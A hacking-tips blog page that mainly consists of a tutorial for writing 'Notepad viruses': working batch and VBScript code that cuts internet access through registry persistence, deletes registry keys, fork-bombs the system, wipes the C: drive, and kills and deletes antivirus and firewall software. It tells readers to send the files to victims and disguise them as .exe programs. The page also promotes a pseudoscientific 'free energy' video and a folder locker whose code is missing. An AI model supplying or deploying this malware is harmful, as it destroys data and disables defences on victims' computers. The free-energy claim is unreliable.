Showing posts with label tips & tricks. Show all posts

Produce Free Energy at Home





Please Subscribe our channel.



In this video i'll show you how you can produce free power or electricity with motors and magnets at home with homemade thing or thing that's are in use. After watching this video i'm sure you are able to do what i did or produce electricity and free power like that i'm showing in this video. So I hope you'll like my videos.

So please don't forget to subscribe my channel CH Side, Because i make many videos like this for you so please don't forget and subscribe our channel for more new intresting videos like that.

Thanks for Watching.



If you find any Problem Contact me on :



Facebook :

                     www.facebook.com/Rehman000786

Twitter :

                  twitter.com/onlinetechlearn

Gmail :

                technicalschool786@gmail.com

Fb Page :

                https://www.facebook.com/Technical-School-510114449380732

                https://www.facebook.com/allfirmwarefiles

                https://www.facebook.com/androidtipsandtricks4u

                https://www.facebook.com/pchardwarendsoftware

                https://www.facebook.com/Computer-Softwares-Tips-Tricks-1339573792817849

                https://www.facebook.com/hackingpoint0/

Number :

                  +923031036758

Create Notepad Virus Executable(.Exe) Using Batch Scripting (Notepad)


Hello Everyone out there, Have you ever thought of creating computer virus by yourself, not to worry I’m right here to tell you how to create simple but dangerous Notepad Virus step by step with explanation.




First of all what is batch scripting, those who don’t know, take a look below:
“It is simply a text file, containing series of commands, which are executed automatically, line by line, when the batch file runs.”
By using Batch File you can create extremely dangerous virus which can delete the Windows files, format different drives [C:\, E:\], steal data files and information, disable antivirus, firewall, etc.
NOTE: This post is solely and mainly for educational purpose only. I am no where responsible for any kind of damage caused by this tutorial.

Follow Us :




Are you ready to create your first DIY Notepad virus, Let’s get started to rock,
First of all you need a Windows PC, obviously. 
For this tutorial to create simple Notepad Virus you don’t need to be a die-hard programmer or something like that, but a basic knowledge of flow charts and loops helps you a lot to understand what’s going on here.

Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given below one by one for different virus in different file.
create notepad virus - copy paste the code
Copy (Ctrl+C) and Paste (Ctrl+V) the source code
Note>> Again, I am not responsible for any damage or error reporting in Your PC, do it as your own risk. Do not try this on you daily working PC.
Notepad Virus source codes are Given below:

1. Disable Internet Permanently

This code will disable the internet connectivity permanently.
echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

2. Delete Key Registry Files

This will delete key registry files, then loops a message
This is dangerous and unrecoverable Notepad Virus.
@ECHO OFF
 START reg delete HKCR/.exe
 START reg delete HKCR/.dll
 START reg delete HKCR/*
 :MESSAGE
 ECHO Your PC has been crashed.Your Dad.
 GOTO MESSAGE

3. Endless Notepads

This will pop up endless notepads until the computer freezes and crashes
@ECHO off
 :top
 START %SystemRoot%\system32\notepad.exe
 GOTO top

4. Popping CD Drives

This will make the CD drives constantly pop out
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 100
 loop

5. Endless Enter

This will make the enter button pressed continuously
Set wshShell = wscript.CreateObject(”WScript.Shell”)
 do
 wscript.sleep 100
 wshshell.sendkeys “~(enter)”
 loop

6. Application Bomber

It will start to open different applications repeatedly which will affect system’s performance.
You can also add application of your choice in above code.
@echo off
 :x
 start winword
 start mspaint
 start notepad
 start write
 start cmd
 start explorer
 start control
 start calc
 goto x

7.Folder Flooder

This will create unlimited no. of folders.
@echo off
:x
md %random%
/folder.
goto x

8.User Account Flooder

This will create large  no. user account on one’s PC and goes on
@echo off
:xnet
user %random% /add
goto x

9.Process Creator

This will create unlimited background processes
%0|%0

10.Windows Hacker

This will delete your whole C:\ drive and it really unrecoverable
@Echo off
Del C:\ *.* |y

10+. Anti Virus Disabler

This large code will disable any antivirus installed on the system
@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
rem
 After copy pasting any one of the virus at a time in the Notepad, save the file in ALL FILES mode with extension “.bat“(without quotes).
create notepad virus- saving virus
Save the file in ALL FILES mode with ‘.bat’ extension
DONE :: Your have successfully created a Notepad Virus. That’s it, now you’re done doing your work now just you have to send the file to the victim.
create notepad virus- batch file
Done creating batch file

There’s a drawback of a batch file notepad virus, that any one can open it with notepad and read the commands easily, and delete it if found it harmful. So, to overcome this limitation/drawback, you can use a tool named ‘Batch to Executable Converter’. It will convert the ‘.bat‘ extension into ‘.exe‘ extension.Hence, your Batch file will be converted into an Windows Application. This will helps in convincing your victim to open the file.
create notepad virus-bat to exe
Bat2Exe
Download BatToExe to Easily convert batch files to executables by clicking here
NOTE: This Tutorial is for windows based computer only, these virus do not work on Linux or MAC.

If you find any Problem Contact me on :

Facebook :
                     www.facebook.com/Rehman000786
Twitter :
                  twitter.com/onlinetechlearn
Gmail :
                technicalschool786@gmail.com
Fb Page :
                https://www.facebook.com/hackingpoint0/
Number :
                  +923031036758

Folder Locker

Lock your personal data in password protected Folder

Step 1 :  Open notepad. [start > Program > accessories > notepad]
Step 2 :  Copy the following code in notepad which is in text area.



            
Step 3 :  Now Save this file with .bat extension. [e.g lock.bat]

Step 4 :  Double click on your file [lock.bat]

>>> Now you can see one folder name with "Secure"

Step 5 :  Move your personal data in this Folder (Secure)

>>> When you want to lock this folder [secure]. just double click on batch file and you can see one window then type Y and hit Enter.

>>> Now you can see your folder [secure] is hide. when you want to access the data into the folder, then double click on batch file and Enter your password. 

[default password is "anonymoushacker" , If you want to change your password then right click on batch file and Now Find "anonymoushacker" and replace it with your password. remember your password, because when you want to access this folder password is necessary]
Copyright © 2013 Anonymous Hacker